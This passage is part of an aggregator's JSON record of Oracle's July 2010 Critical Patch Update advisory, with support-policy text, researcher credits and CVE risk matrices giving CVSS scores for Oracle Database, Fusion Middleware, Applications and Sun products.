these vulnerabilities.\r\n\r\nCritical Patch Update patches are not provided for product versions that are no longer covered under the Premier Support or Extended Support phases of the Lifetime Support Policy. We recommend that customers upgrade to the latest supported version of Oracle products in order to obtain patches.\r\nProducts in Extended Support\r\nCritical Patch Update patches are available to customers who have purchased Extended Support under the Lifetime Support Policy. Customers must have a valid Extended Support service contract to download Critical Patch Update patches for products in the Extended Support Phase.\r\n\r\nSupported Database, Fusion Middleware, EM Grid Control and Collaboration Suite products are patched in accordance with the Software Error Correction Support Policy explained in My Oracle Support Note 209768.1. Please review the Technical Support Policies for further guidelines regarding support policies and phases of support.\r\nOn Request Model\r\n\r\nOracle proactively creates patches only for platform/version combinations that, based on historical data, customers are likely to download for the next Critical Patch Update. We create patches for historically inactive platform/version combinations of the Oracle Database, Oracle Application Server and Enterprise Manager only if requested by customers.\r\n\r\nRefer to Critical Patch Update July 2010 Patch Availability Document for Oracle Products (My Oracle Support Note 1089044.1) for further details regarding the On Request patches.\r\nCredit Statement\r\nThe following people or organizations discovered and brought security vulnerabilities addressed by this Critical Patch Update to Oracle's attention: Maksymilian Arciemowicz of SecurityReason; Okan Basegmez of DORASEC Consulting; Check Point Software; Esteban Martinez Fayo of Application Security, Inc.; Stephen Fewer of iDefense; Roy Fox of Sentrigo; Tobias Klein; Ofer Maor of Hacktics; MarkoT of Corelan Team; Slavik Markovich of Sentrigo; Andrea Micalizzi of TippingPoint's Zero Day Initiative; Monarch2020 of unsecurityresearch; Timothy D. Morgan of Virtual Security Research; Martin O'Neal of Corsaire Limited; Petko Petkov of Corsaire Limited; Cody Pierce of TippingPoint DVLabs; Andrea Purificato; an Anonymous Reporter of TippingPoint's Zero Day Initiative; John S.; Piotr Samborski of Wyższa Szkoła Informatyki; Sumit Siddharth; Frank Stuart; Laszlo Toth; Janek Vind of iDefense; and Dennis Yurichev of Sentrigo.\r\nSecurity-In-Depth Contributors\r\nOracle provides recognition to people that have contributed to our Security-In-Depth program (see FAQ). People are recognized for Security-In-Depth contributions if they provide information, observations or suggestions pertaining to security vulnerability issues that result in significant modification of Oracle code or documentation in future releases, but are not of such a critical nature that they are distributed in Critical Patch Updates.\r\n\r\nFor this Critical Patch Update, Oracle recognizes Stefano Di Paola of Minded Security; Alexandr Polyakov of Digital Security; Ian de Villiers of SensePost Information Security; Chris Weber of Casaba Security; and Paul M. Wright for contributions to Oracle's Security-In-Depth program.\r\nCritical Patch Update Schedule\r\n\r\nCritical Patch Updates are typically released on the Tuesday closest to the 15th day of January, April, July and October. Starting 2011, the scheduled dates for the release of Critical Patch Updates will be on the Tuesday closest to the 17th day of January, April, July and October. The next four dates are:\r\n\r\n * 12 October 2010\r\n * 18 January 2011\r\n * 19 April 2011\r\n * 19 July 2011\r\n\r\nReferences\r\n\r\n * Oracle Critical Patch Updates and Security Alerts main page [ Oracle Technology Network ]\r\n * Critical Patch Update - July 2010 Documentation Map [ My Oracle Support Note 1128882.1 ]\r\n * Oracle Critical Patch Updates and Security Alerts - Frequently Asked Questions [ CPU FAQ ] \r\n * Risk Matrix definitions [ Risk Matrix Definitions ]\r\n * Use of Common Vulnerability Scoring System (CVSS) by Oracle [ Oracle CVSS Scoring ]\r\n * List of public vulnerabilities fixed in Critical Patch Updates and Security Alerts [ Oracle Technology Network ]\r\n * Software Error Correction Support Policy [ My Oracle Support Note 209768.1 ]\r\n * Previous Security Advisories Notifications for BEA products [ BEA Security Advisories ]\r\n\r\nModification History\r\n\r\n2010-July-13 \tRev 1. Initial Release\r\n\r\n\r\n\r\nAppendix - Oracle Database Server\r\n\r\nOracle Database Server Executive Summary\r\n\r\nThis Critical Patch Update contains 13 new Security fixes for the Oracle Database Server divided as follows:\r\n\r\n * 6 new security fixes for the Oracle Database Server. 4 of these vulnerabilities may be remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password. 1 of these fixes is applicable to client-only installations, i.e., installations that do not have the Oracle Database Server installed.\r\n * 2 new security fixes for Oracle TimesTen In-Memory Database. Both of these vulnerabilities may be remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password. \r\n * 5 new security fixes for Oracle Secure Backup. 3 of these vulnerabilities may be remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password. \r\n\r\n\r\nOracle Database Server Risk Matrix\r\n\r\nCVE# \tComponent \tProtocol \tPackage and/or Privilege Required \tRemote Exploit without Auth.? \tCVSS VERSION 2.0 RISK (see Risk Matrix Definitions) \tLast Affected Patch set (per Supported Release) \tNotes\r\nBase Score \tAccess Vector \tAccess Complexity \tAuthentication \tConfidentiality \tIntegrity \tAvailability\r\nCVE-2010-0911 \tListener \tOracle Net \tNone \tYes \t7.8 \tNetwork \tLow \tNone \tNone \tNone \tComplete \t9.2.0.8, 9.2.0.8DV, 10.1.0.5, 10.2.0.4, 11.1.0.7, 11.2.0.1 \t \r\nCVE-2010-0903 \tNet Foundation Layer \tOracle Net \tNone \tYes \t7.8 \tNetwork \tLow \tNone \tNone \tNone \tComplete \t9.2.0.8, 10.1.0.5, 10.2.0.4, 11.1.0.7, 11.2.0.1 \tSee Note 1\r\nCVE-2010-0902 \tOracle OLAP \tOracle Net \tCreate Session \tNo \t6.0 \tNetwork \tMedium \tSingle \tPartial+ \tPartial+ \tPartial+ \t9.2.0.8, 9.2.0.8DV, 10.1.0.5, 10.2.0.4, 11.1.0.7, 11.2.0.1 \t \r\nCVE-2010-0892 \tApplication Express \tHTTP \tNone \tYes \t4.3 \tNetwork \tMedium \tNone \tNone \tPartial \tNone \t3.2.0.00.27 \tSee Note 2\r\nCVE-2010-0900 \tNetwork Layer \tOracle Net \tNone \tYes \t2.6 \tNetwork \tHigh \tNone \tNone \tNone \tPartial \t9.2.0.8, 10.1.0.5, 10.2.0.4, 11.1.0.7, 11.2.0.1 \tSee Note 1\r\nCVE-2010-0901 \tExport \tOracle Net \tSelect Any Dictionary \tNo \t2.1 \tNetwork \tHigh \tSingle \tPartial \tNone \tNone \t9.2.0.8, 9.2.0.8DV, 10.1.0.5, 10.2.0.4, 11.1.0.7, 11.2.0.1 \t \r\n \r\n\r\nNotes:\r\n\r\n 1. This bug is applicable to Windows only.\r\n 2. For patching information please see Critical Patch Update July 2010 Patch Availability Document for Oracle Products, My Oracle Support Note 1089044.1.\r\n\r\nOracle Database Server Client-Only Installations\r\n\r\nThe following Oracle Database Server vulnerability included in this Critical Patch Update affects client-only installations: CVE-2010-0900.\r\n\r\n\r\nOracle TimesTen In-Memory Database Executive Summary\r\n\r\nThis Critical Patch Update contains 2 new security fixes for Oracle TimesTen In-Memory Database. Both of these vulnerabilities may be remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password. \r\n\r\nOracle TimesTen In-Memory Database Risk Matrix\r\n\r\nCVE# \tComponent \tProtocol \tPackage and/or Privilege Required \tRemote Exploit without Auth.? \tCVSS VERSION 2.0 RISK (see Risk Matrix Definitions) \tLast Affected Patch set (per Supported Release) \tNotes\r\nBase Score \tAccess Vector \tAccess Complexity \tAuthentication \tConfidentiality \tIntegrity \tAvailability\r\nCVE-2010-0873 \tData Server \tTCP \tNone \tYes \t10.0 \tNetwork \tLow \tNone \tComplete \tComplete \tComplete \t7.0.6.0 \tSee Note 1\r\nCVE-2010-0910 \tData Server \tTCP \tNone \tYes \t5.0 \tNetwork \tLow \tNone \tNone \tNone \tPartial+ \t7.0.6.0, 11.2.1.4.1 \tSee Note 1\r\n \r\n\r\nNotes:\r\n\r\n 1. For patching information please see Critical Patch Update July 2010 Patch Availability Document for Oracle Products, My Oracle Support Note 1089044.1.\r\n\r\n\r\n\r\nOracle Secure Backup Executive Summary\r\n\r\nThis Critical Patch Update contains 5 new security fixes for Oracle Secure Backup. 3 of these vulnerabilities may be remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password. \r\n\r\nOracle Secure Backup Risk Matrix\r\n\r\nCVE# \tComponent \tProtocol \tPackage and/or Privilege Required \tRemote Exploit without Auth.? \tCVSS VERSION 2.0 RISK (see Risk Matrix Definitions) \tLast Affected Patch set (per Supported Release) \tNotes\r\nBase Score \tAccess Vector \tAccess Complexity \tAuthentication \tConfidentiality \tIntegrity \tAvailability\r\nCVE-2010-0898 \tOracle Secure Backup \tTCP \tNone \tYes \t10.0 \tNetwork \tLow \tNone \tComplete \tComplete \tComplete \t10.3.0.1 \t \r\nCVE-2010-0907 \tOracle Secure Backup \tHTTP \tNone \tYes \t10.0 \tNetwork \tLow \tNone \tComplete \tComplete \tComplete \t10.3.0.1 \tSee Note 1\r\nCVE-2010-0899 \tOracle Secure Backup \tHTTP \tValid Session \tNo \t9.0 \tNetwork \tLow \tSingle \tComplete \tComplete \tComplete \t10.3.0.1 \tSee Note 2\r\nCVE-2010-0906 \tOracle Secure Backup \tHTTP \tValid Session \tNo \t9.0 \tNetwork \tLow \tSingle \tComplete \tComplete \tComplete \t10.3.0.1 \tSee Note 3\r\nCVE-2010-0904 \tOracle Secure Backup \tHTTP \tNone \tYes \t5.0 \tNetwork \tLow \tNone \tNone \tPartial+ \tNone \t10.3.0.1 \t \r\n \r\n\r\nNotes:\r\n\r\n 1. CVSS Score is 10.0 for Windows based installation. For Linux, Unix and other platforms, the CVSS Base Score is 7.5, and the impacts for Confidentiality, Integrity and Availability are Partial.\r\n 2. This bug is applicable to Windows only.\r\n 3. CVSS Score is 9.0 for Windows based installation. For Linux, Unix and other platforms, the CVSS Base Score is 6.5, and the impacts for Confidentiality, Integrity and Availability are Partial.\r\n\r\n\r\n\r\nAppendix - Oracle Fusion Middleware\r\n\r\nOracle Fusion Middleware Executive Summary\r\n\r\nThis Critical Patch Update contains 7 new security fixes for Oracle Fusion Middleware. 5 of these vulnerabilities may be remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password. \r\n\r\nOracle Fusion Middleware products may be affected by the vulnerabilities listed in the Oracle Database section. Oracle Database security fixes are not listed in the Oracle Fusion Middleware risk matrix. For more detailed information refer to Critical Patch Update July 2010 Patch Availability Document for Oracle Products, My Oracle Support Note 1089044.1.\r\n\r\nOracle Fusion Middleware Risk Matrix\r\n\r\nCVE# \tComponent \tProtocol \tPackage and/or Privilege Required \tRemote Exploit without Auth.? \tCVSS VERSION 2.0 RISK (see Risk Matrix Definitions) \tLast Affected Patch set (per Supported Release) \tNotes\r\nBase Score \tAccess Vector \tAccess Complexity \tAuthentication \tConfidentiality \tIntegrity \tAvailability\r\nCVE-2010-0849 \tJRockit \tNone \tNone \tYes \t7.5 \tNetwork \tLow \tNone \tPartial+ \tPartial+ \tPartial+ \tR27.6.6: JRE/JDK 1.4.2, 5 and 6; R28.0.0: JRE/JDK 5 and 6; \tSee Note 1\r\nCVE-2009-3555 \tWebLogic Server \tHTTP \tNone \tYes \t6.4 \tNetwork \tLow \tNone \tNone \tPartial \tPartial \t7.0 SP7, 8.1 SP6, 9.0, 9.1, 9.2 MP3, 10.0 MP2, 10.3.2 \t \r\nCVE-2010-2375 \tWebLogic Server \tHTTP \tPlugins for Apache, Sun and IIS web servers \tYes \t6.4 \tNetwork \tLow \tNone \tPartial \tPartial \tNone \t7.0 SP7, 8.1 SP6, 9.0, 9.1, 9.2 MP3, 10.0 MP2, 10.3.2, 10.3.3 \t \r\nCVE-2010-2370 \tOracle Business Process Management \tHTTP \tBPM Process Administrator \tYes \t4.3 \tNetwork \tMedium \tNone \tNone \tPartial \tNone \t5.7 MP3, 6.0 MP5, 10.3 MP2 \t \r\nCVE-2010-0835 \tWireless \tHTTP \tNone \tYes \t4.3 \tNetwork \tMedium \tNone \tNone \tPartial \tNone \t10.1.2.3 \t \r\nCVE-2010-0081 \tApplication Server Control \tHTTP \tValid Session \tNo \t3.5 \tNetwork \tMedium \tSingle \tNone \tPartial \tNone \t10.1.2.3, 10.1.4.0.1 \t \r\nCVE-2010-2381 \tApplication Server Control \tHTTP \tValid Session \tNo \t3.5 \tNetwork \tMedium \tSingle \tNone \tPartial \tNone \t10.1.2.3, 10.1.4.0.1 \t \r\n \r\n\r\nNotes:\r\n\r\n 1. Oracle released Java Critical Patch Update in March 2010 to address multiple vulnerabilities affecting the Java Runtime Environment. Oracle CVE-2010-0849 refers to the advisories that were applicable to JRockit from the Java Critical Patch Update. The CVSS score of this vulnerability CVE# reflects the highest among those fixed in JRockit. The complete list of all advisories addressed in JRockit under CVE-2010-0849 is as follows: CVE-2010-0084, CVE-2010-0085, CVE-2010-0087, CVE-2010-0088, CVE-2010-0091, CVE-2010-0092, CVE-2009-3555, CVE-2010-0094, CVE-2010-0095, CVE-2010-0837, CVE-2010-0838, CVE-2010-0839, CVE-2010-0840, CVE-2010-0841, CVE-2010-0842, CVE-2010-0843, CVE-2010-0844, CVE-2010-0846, CVE-2010-0847, CVE-2010-0848, CVE-2010-0849.\r\n\r\n\r\n\r\nAppendix - Oracle Enterprise Manager Grid Control\r\n\r\nOracle Enterprise Manager Grid Control Executive Summary\r\n\r\nThis Critical Patch Update contains 1 new security fix for Oracle Enterprise Manager Grid Control. This vulnerability is remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password. This fix is not applicable to client-only installations, i.e., installations that do not have Oracle Enterprise Manager Grid Control installed.\r\n\r\nOracle Enterprise Manager Grid Control Risk Matrix\r\n\r\nCVE# \tComponent \tProtocol \tPackage and/or Privilege Required \tRemote Exploit without Auth.? \tCVSS VERSION 2.0 RISK (see Risk Matrix Definitions) \tLast Affected Patch set (per Supported Release) \tNotes\r\nBase Score \tAccess Vector \tAccess Complexity \tAuthentication \tConfidentiality \tIntegrity \tAvailability\r\nCVE-2010-2373 \tConsole \tHTTP \tNone \tYes \t4.3 \tNetwork \tMedium \tNone \tNone \tPartial \tNone \t10.1.0.6, 10.2.0.5 \t \r\n \r\n\r\n\r\n\r\nAppendix - Oracle Applications\r\n\r\nOracle Applications Executive Summary\r\n\r\nThis Critical Patch Update contains 17 new Security fixes for the Oracle Applications divided as follows:\r\n\r\n * 7 new security fixes for the Oracle E-Business Suite. 5 of these vulnerabilities may be remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password. \r\n * 2 new security fixes for the Oracle Supply Chain Products Suite. 1 of these vulnerabilities may be remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password. \r\n * 8 new security fixes for the Oracle PeopleSoft and JDEdwards Suite. None of these vulnerabilities may be remotely exploitable without authentication, i.e., none may be exploited over a network without the need for a username and password. \r\n\r\n\r\nOracle E-Business Suite products include Oracle Database and Oracle Fusion Middleware components that are affected by the vulnerabilities listed in the Oracle Database and Fusion Middleware sections. The exposure of Oracle E-Business Suite products is dependent on the Oracle Database and Fusion middleware versions being used. Oracle Database and Fusion Middleware security fixes are not listed in the Oracle E-Business Suite risk matrix, but since vulnerabilities affecting these versions may affect Oracle E-Business Suite products, Oracle recommends that customers apply the July 2010 Critical Patch Update to the Oracle Database and Fusion Middleware components of Oracle E-Business Suite. Refer to Oracle E-Business Suite Critical Patch Update for July 2010, My Oracle Support Note 986534.1 for more detailed information.\r\n\r\n\r\nOracle E-Business Suite Risk Matrix\r\n\r\nCVE# \tComponent \tProtocol \tPackage and/or Privilege Required \tRemote Exploit without Auth.? \tCVSS VERSION 2.0 RISK (see Risk Matrix Definitions) \tLast Affected Patch set (per Supported Release) \tNotes\r\nBase Score \tAccess Vector \tAccess Complexity \tAuthentication \tConfidentiality \tIntegrity \tAvailability\r\nCVE-2010-0908 \tOracle Applications Framework \tHTTP \tNone \tYes \t7.5 \tNetwork \tLow \tNone \tPartial \tPartial \tPartial \t12.1.2 \t \r\nCVE-2010-0915 \tOracle Advanced Product Catalog \tHTTP \tSpecific page access required \tNo \t5.5 \tNetwork \tLow \tSingle \tPartial+ \tPartial+ \tNone \t11.5.10.2, 12.0.6, 12.1.2 \t \r\nCVE-2010-0912 \tOracle Applications Framework \tHTTP \tNone \tYes \t4.3 \tNetwork \tMedium \tNone \tNone \tPartial \tNone \t11.5.10.2, 12.0.6, 12.1.2 \t \r\nCVE-2010-0905 \tOracle Applications Manager \tHTTP \tNone \tYes \t4.3 \tNetwork \tMedium \tNone \tNone \tPartial \tNone \t11.5.10.2, 12.0.4 \t \r\nCVE-2010-0913 \tOracle Applications Manager \tHTTP \tNone \tYes \t4.3 \tNetwork \tMedium \tNone \tNone \tPartial \tNone \t11.5.10.2, 12.0.6, 12.1.2 \t \r\nCVE-2010-0909 \tOracle Applications Framework \tHTTP \tValid session \tNo \t3.5 \tNetwork \tMedium \tSingle \tPartial \tNone \tNone \t11.5.10.2, 12.0.6, 12.1.2 \t \r\nCVE-2010-0836 \tOracle Knowledge Management \tHTTP \tNone \tYes \t2.6 \tNetwork \tHigh \tNone \tNone \tPartial \tNone \t11.5.10.2, 12.0.6, 12.1.2 \t \r\n \r\n\r\n\r\n\r\nOracle Supply Chain Products Suite Executive Summary\r\n\r\nThis Critical Patch Update contains 2 new security fixes for the Oracle Supply Chain Products Suite. 1 of these vulnerabilities may be remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password. \r\n\r\nOracle Supply Chain Products Suite Risk Matrix\r\n\r\nCVE# \tComponent \tProtocol \tPackage and/or Privilege Required \tRemote Exploit without Auth.? \tCVSS VERSION 2.0 RISK (see Risk Matrix Definitions) \tLast Affected Patch set (per Supported Release) \tNotes\r\nBase Score \tAccess Vector \tAccess Complexity \tAuthentication \tConfidentiality \tIntegrity \tAvailability\r\nCVE-2010-2372 \tOracle Transportation Management \tHTTP \tNone \tYes \t4.3 \tNetwork \tMedium \tNone \tNone \tPartial \tNone \t6.1.1 \t \r\nCVE-2010-2371 \tOracle Transportation Management \tHTTP \tNone \tNo \t1.9 \tLocal \tMedium \tNone \tPartial \tNone \tNone \t6.1.1 \t \r\n \r\n\r\n\r\n\r\nOracle PeopleSoft and JDEdwards Suite Executive Summary\r\n\r\nThis Critical Patch Update contains 8 new security fixes for the Oracle PeopleSoft and JDEdwards Suite. None of these vulnerabilities may be remotely exploitable without authentication, i.e., none may be exploited over a network without the need for a username and password. \r\n\r\nOracle PeopleSoft and JDEdwards Suite Risk Matrix\r\n\r\nCVE# \tComponent \tProtocol \tPackage and/or Privilege Required \tRemote Exploit without Auth.? \tCVSS VERSION 2.0 RISK (see Risk Matrix Definitions) \tLast Affected Patch set (per Supported Release) \tNotes\r\nBase Score \tAccess Vector \tAccess Complexity \tAuthentication \tConfidentiality \tIntegrity \tAvailability\r\nCVE-2010-2401 \tPeopleSoft Enterprise HCM - eProfile Mgr \tHTTP \tValid Session \tNo \t5.5 \tNetwork \tLow \tSingle \tPartial \tPartial \tNone \tHCM 9.0 Bundle #9 \t \r\nCVE-2010-2402 \tPeopleSoft Enterprise PeopleTools \tHTTP \tValid Session \tNo \t5.5 \tNetwork \tLow \tSingle \tPartial+ \tPartial+ \tNone \t8.49.27 \t \r\nCVE-2010-2380 \tPeopleSoft Enterprise FSCM \tHTTP \tValid Session \tNo \t4.3 \tLocal \tLow \tSingle \tPartial \tPartial \tPartial \tSCM 8.9 Bundle #37 SCM 9.0 Bundle #30 SCM 9.1 Bundle #4 \t \r\nCVE-2010-2398 \tPeopleSoft Enterprise HCM \tHTTP \tValid Session \tNo \t4.0 \tNetwork \tLow \tSingle \tPartial \tNone \tNone \tHCM 9.0 Bundle #12 \t \r\nCVE-2010-2379 \tPeopleSoft Enterprise HCM - Time & Labor \tHTTP \tValid Session \tNo \t4.0 \tNetwork \tLow \tSingle \tPartial \tNone \tNone \tHCM 9.0 Bundle #13 HCM 9.1 Bundle #2 \t \r\nCVE-2010-2377 \tPeopleSoft Enterprise PeopleTools \tHTTP \tValid Session \tNo \t4.0 \tNetwork \tLow \tSingle \tNone \tPartial \tNone \t8.49.27 8.50.10 \t \r\nCVE-2010-2378 \tPeopleSoft Enterprise CRM \tHTTP \tValid Session \tNo \t3.0 \tLocal \tMedium \tSingle \tPartial \tPartial \tNone \tCRM 9.0 Bundle #28 CRM 9.1 Bundle #4 \t \r\nCVE-2010-2403 \tPeopleSoft Enterprise Campus Solutions \tHTTP \tValid Session \tNo \t2.1 \tNetwork \tHigh \tSingle \tPartial \tNone \tNone \tCampus Solutions 9.0 Bundle #17 \t \r\n \r\n\r\n\r\n\r\nAppendix - Oracle Sun Products Suite\r\n\r\nOracle Sun Products Suite Executive Summary\r\n\r\nThis Critical Patch Update contains 21 new security fixes for the Oracle Sun Products Suite. 7 of these vulnerabilities may be remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password. \r\n\r\nOracle is in the process of aligning the Sun Microsystems policies with Oracle Software Security Assurance policies and procedures. For details, please refer to Changes in security policies for the Sun product lines.\r\n\r\nOracle Sun Products Suite Risk Matrix\r\n\r\nCVE# \tComponent \tProtocol \tSub\r\ncomponent \tRemote Exploit without Auth.? \tCVSS VERSION 2.0 RISK (see Risk Matrix Definitions) \tLast Affected Patch set (per Supported Release) \tNotes\r\nBase Score \tAccess Vector \tAccess Complexity \tAuthentication \tConfidentiality \tIntegrity \tAvailability\r\nCVE-2010-0083 \tSolaris \tRPC \tToolTalk \tYes \t7.6 \tNetwork \tHigh \tNone \tComplete \tComplete \tComplete \t8, 9, 10, OpenSolaris \t \r\nCVE-2008-4247 \tSolaris \tFTP \tFTP Server \tYes \t7.5 \tNetwork \tLow \tNone \tPartial \tPartial \tPartial \t8, 9, 10, OpenSolaris \t \r\nCVE-2010-0916 \tSolaris \tNone \trdist \tNo \t6.2 \tLocal \tHigh \tNone \tComplete \tComplete \tComplete \t10, OpenSolaris \t \r\nCVE-2010-2385 \tSun Java System Web Proxy Server \tHTTP \tAdministration Server \tYes \t5.8 \tNetwork \tMedium \tNone \tPartial \tPartial \tNone \t4.0.13 \t \r\nCVE-2010-2392 \tSolaris \tNone \tZFS \tNo \t5.6 \tLocal \tLow \tNone \tNone \tPartial \tComplete \t10, OpenSolaris \t \r\nCVE-2010-0914 \tSun Convergence \tHTTP \tMail, Calendar, Address Book, and Instant Messaging. \tYes \t5.0 \tNetwork \tLow \tNone \tPartial \tNone \tNone \t1.0 \t \r\nCVE-2010-2386 \tSolaris \tNone \tGigaSwift Ethernet Driver \tNo \t4.9 \tLocal \tLow \tNone \tNone \tNone \tComplete \t8, 9, 10, OpenSolaris \t \r\nCVE-2010-2394 \tSolaris \tTCP, UDP \tTCP/IP \tNo \t4.7 \tLocal \tMedium \tNone \tNone \tNone \tComplete \t10 \t \r\nCVE-2010-2399 \tSolaris \tNone \tKernel/VM \tNo \t4.6 \tLocal \tLow \tSingle \tNone \tNone \tComplete \t10, OpenSolaris \t \r\nCVE-2010-2400 \tSolaris \tNone \tKernel/Filesystem \tNo \t4.6 \tLocal \tLow \tSingle \tNone \tNone \tComplete \t9, 10, OpenSolaris \t \r\nCVE-2009-3763 \tAccess Manager / OpenSSO \tHTTP \tAuthentication \tYes \t4.3 \tNetwork \tMedium \tNone \tNone \tPartial \tNone \t7.1, 7 2005Q4, OpenSSO Enterprise 8.0 \t \r\nCVE-2009-3764 \tOpenSSO \tHTTP \tNone \tYes \t4.3 \tNetwork \tMedium \tNone \tNone \tPartial \tNone \tOpenSSO Enterprise 8.0 \t \r\nCVE-2009-3762 \tOpenSSO \tHTTP \tNone \tYes \t4.3 \tNetwork \tMedium \tNone \tNone \tPartial \tNone \tOpenSSO Enterprise 8.0 \t \r\nCVE-2010-2393 \tSolaris \tNone \tKernel/RPC \tNo \t3.8 \tLocal \tHigh \tSingle \tNone \tNone \tComplete \t10, OpenSolaris \t \r\nCVE-2009-0217 \tOpenSSO \tHTTP \tMetro Web Services \tNo \t3.5 \tNetwork \tMedium \tSingle \tNone \tPartial \tNone \tOpenSSO Enterprise 8.0 \t \r\nCVE-2010-2376 \tSolaris \tNone \tSolaris Management Console \tNo \t3.2 \tLocal \tLow \tSingle \tPartial \tPartial \tNone \t8, 9, 10 \t \r\nCVE-2010-2382 \tSolaris \tNone \tInstall Software \tNo \t3.2 \tLocal \tLow \tSingle \tPartial \tPartial \tNone \t8, 9, 10 \t \r\nCVE-2010-2383 \tSolaris \tNone \tNFS \tNo \t3.2 \tLocal \tLow \tSingle \tPartial \tPartial \tNone \t8, 9, 10, OpenSolaris \t \r\nCVE-2010-2384 \tSolaris \tNone \tSolaris Management Console \tNo \t3.2 \tLocal \tLow \tSingle \tPartial \tPartial \tNone \t9, 10 \t \r\nCVE-2010-2374 \tSolaris Studio \tNone \tNone \tNo \t3.0 \tLocal \tMedium \tSingle \tPartial \tPartial \tNone \t12 update 1 \t \r\nCVE-2010-2397 \tSun GlassFish Enterprise Server, Sun Java System Application Server \tNone \tGUI \tNo \t2.4 \tLocal \tHigh \tSingle \tPartial \tPartial \tNone \tSun Java System Application Server 8.0, 8.1, 8.2, GlassFish Enterprise Server v2.1.1 \t", "edition": 1, "modified": "2010-07-15T00:00:00", "published": "2010-07-15T00:00:00", "id": "SECURITYVULNS:DOC:24227", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24227", "title": "Oracle Critical Patch Update Advisory - July 2010", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oracle": [{"lastseen": "2019-05-29T18:21:02", "bulletinFamily": "software", "cvelist": ["CVE-2010-2374", "CVE-2010-0903", "CVE-2010-0892", "CVE-2010-2386", "CVE-2010-0873", "CVE-2010-0913", "CVE-2010-0907", "CVE-2010-0906", "CVE-2010-0088", "CVE-2010-2384", "CVE-2010-2379", "CVE-2009-0217", "CVE-2010-0085", "CVE-2010-0902", "CVE-2010-0087", "CVE-2010-2377", "CVE-2009-3762", "CVE-2010-2376", "CVE-2010-2372", "CVE-2010-0908", "CVE-2010-0092", "CVE-2008-4247", "CVE-2010-0848", "CVE-2010-0914", "CVE-2010-2385", "CVE-2010-0838", "CVE-2010-0840", "CVE-2010-0095", "CVE-2010-2397", "CVE-2010-0839", "CVE-2010-0094", "CVE-2010-0081", "CVE-2010-2393", "CVE-2010-0898", "CVE-2010-0847", "CVE-2010-2378", "CVE-2010-2401", "CVE-2010-0842", "CVE-2010-0900", "CVE-2010-2398", "CVE-2009-3555", "CVE-2010-0841", "CVE-2010-0844", "CVE-2010-0846", "CVE-2010-0912", "CVE-2010-0837", "CVE-2010-0835", "CVE-2010-0915", "CVE-2009-3764", "CVE-2010-0910", "CVE-2010-0849", "CVE-2010-2381", "CVE-2010-2371", "CVE-2010-2394", "CVE-2010-0091", "CVE-2010-2380", "CVE-2010-2403", "CVE-2010-0911", "CVE-2010-2392", "CVE-2010-0916", "CVE-2010-2383", "CVE-2010-2370", "CVE-2010-0904", "CVE-2010-2375", "CVE-2010-0909", "CVE-2010-2382", "CVE-2010-0899", "CVE-2010-0083", "CVE-2010-0905", "CVE-2010-2402", "CVE-2010-2400", "CVE-2010-0836", "CVE-2010-0843", "CVE-2009-3763", "CVE-2010-2399", "CVE-2010-0084", "CVE-2010-2373", "CVE-2010-0901"], "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. It also includes non-security fixes that are required (because of interdependencies) by those security patches. Critical Patch Updates are cumulative, except as noted below, but each advisory describes only the security fixes added since the previous Critical Patch Update. Thus, prior Critical Patch Update Advisories should be reviewed for information regarding earlier accumulated security fixes. Please refer to:\n\nCritical Patch Updates and Security Alerts\n\n**Due to the threat posed by a successful attack, Oracle strongly recommends that customers apply CPU fixes as soon as possible.** This Critical Patch Update contains 59 new security fixes across all product families listed below.\n\nOracle is in the process of aligning the Sun Microsystems policies with Oracle Software Security Assurance policies and procedures. For details, please refer to [Changes in security policies for the Sun product lines.](<http://www.oracle.com/technology/deploy/security/changesforsunsecuritypolicies.htm>)\n", "modified": "2010-07-13T00:00:00", "published": "2010-07-13T00:00:00", "id": "ORACLE:CPUJUL2010-155308", "href": "", "type": "oracle", "title": "Security | Oracle Critical Patch Update - July 2010", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}